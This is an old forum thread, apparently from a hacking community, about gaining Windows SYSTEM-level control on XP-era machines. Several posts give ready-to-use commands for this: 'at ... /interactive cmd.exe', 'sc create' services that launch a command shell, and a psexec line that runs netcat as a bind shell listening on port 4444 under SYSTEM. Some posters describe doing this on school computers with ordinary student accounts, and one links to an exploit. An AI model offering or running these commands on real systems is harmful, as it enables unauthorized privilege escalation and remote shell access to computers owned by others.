Sign in to follow this  
Followers 0
wethcr

Windows System User

18 posts in this topic

When was it found out that you cold log onto the Windows XP System account from a limited account? Yes u have full control of the computer and domain if your on 1
Just wondering cuz its a nice little thing to Know and just curious as to how long after XP was released it was found.

Is this even a well known issue of XP? Edited by wethcr

Share this post


Link to post
Share on other sites
Depends on what you are talking about logging into the SYSTEM account. If you're talking about, I know the one I use works in 2000,XP,2003, and Vista.

Share this post


Link to post
Share on other sites
Use the command [codebox]at (insert time + 1 minute here) /interactive cmd.exe[/codebox]
A new Command Prompt will open, and next open up the Task Manager. End Explorer.exe and start it again in the new Command Prompt by typing explorer.exe. The desktop will refresh, and voila, you are superuser. just logoff and log on again to go back. In superuser you can control everything.

Share this post


Link to post
Share on other sites
sc delete killall
sc create killall binpath= "cmd /K start c:\cax /killuser "%username%" type= own type= interact
sc start killall


sc runs as system..

Share this post


Link to post
Share on other sites
We were messing with this today on our school network (with permission). We get our own hard drives for our labs and we can put/do whatever we want to these HDs. The 'at' command can be run as users with greater than a regular user account in. The guest account cant do this on Vista or WinXP's, but in earlier versions of Windoze you can do A LOT more than you think with the Guest account. So for those with Windows ME/2000/2003 try it out in the guest account, it works in most cases. But operator posted the best option. :)

Share this post


Link to post
Share on other sites
Thanks for the info every1. Could someone elaborate on operators post with the SC please seems like something that would be good to know

Thanks
Wethcr

Share this post


Link to post
Share on other sites
[url="http://support.microsoft.com/kb/251192"]http://support.microsoft.com/kb/251192[/url]

Share this post


Link to post
Share on other sites
This is a cool trick and all... but how do you run AT with any account that isn't a member of the local Administrators group?

From [url="http://www.microsoft.com/resources/documentation/windows/xp/all/proddocs/en-us/ntcmds.mspx?mfr=true"]http://www.microsoft.com/resources/documen...s.mspx?mfr=true[/url] :

[quote]Using at

To use at, you must be a member of the local Administrators group.[/quote]

Every so many months, these boards get random postings consisting of "You can escalate Windows priviledges using AT," and some posters even claim this can be done with a regular user.

I assure you this is NOT the case, in a normally configured system. While you can escalate administrator-level priviledges to the SYSTEM account, you can't do this with a regular user. Just because you're not logged in as "Administrator" doesn't mean you're not [b]an[/b] administrator of the system. I think a lot of you are getting confused, and thinking that just because your user account isn't named "Administrator," that it must not be an administrator, and thus that this trick can be performed with a generic user account.

Try AT out sometime, with an account you are positive is only a member of the regular "Users" group. You will be pleasently disapointed. Edited by Dirk Chestnut

Share this post


Link to post
Share on other sites
You don't hafta be in the admin group to run at.... We do this at school all the time with our plain old student account. And i kno that isnt admin cuz we cant even install anything.

Share this post


Link to post
Share on other sites
it may just be a poorly configured account > a regular user account in the user's group. The account could also be an account created for students, and net set to a default user. The person who set it up may just have forgotten about 'at'.

Share this post


Link to post
Share on other sites
psexec can do wonders too!!

Suppose you run nc.exe located at c:\windows\system32
psexec -d -s c:\windows\system32\nc.exe -L -p 4444 -d -e cmd.exe
this will run netcat unser the system account and psexec will exit after the execution!!

better use old versions of psexec which came with backtrack1 the newer one shows an agreement (cannot be run on a remote machines as it pulls up GUI!!) Edited by Anon-De-Anonymous

Share this post


Link to post
Share on other sites
[quote name='Hartley' post='251951' date='Apr 17 2007, 07:04 AM']sc create hak binpath= "cmd /K start" type= own type= interact

works well good. :ranaway:[/quote]

that works with Admin priviledges only and not as a User

Share this post


Link to post
Share on other sites
could use this way [url="http://www.hak5.org/wiki/Administrator_Control"]http://www.hak5.org/wiki/Administrator_Control[/url]

Share this post


Link to post
Share on other sites
[quote name='Hartley' post='252249' date='Apr 18 2007, 01:26 PM']could use this way [url="http://www.hak5.org/wiki/Administrator_Control"]http://www.hak5.org/wiki/Administrator_Control[/url][/quote]

Yeah Thats must work!! Thx

Share this post


Link to post
Share on other sites
The best way would be to use a real exploit like this one [url="http://www.milw0rm.com/exploits/3755"]http://www.milw0rm.com/exploits/3755[/url] I have never taken any time to understand them though so never used one.

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now
Sign in to follow this  
Followers 0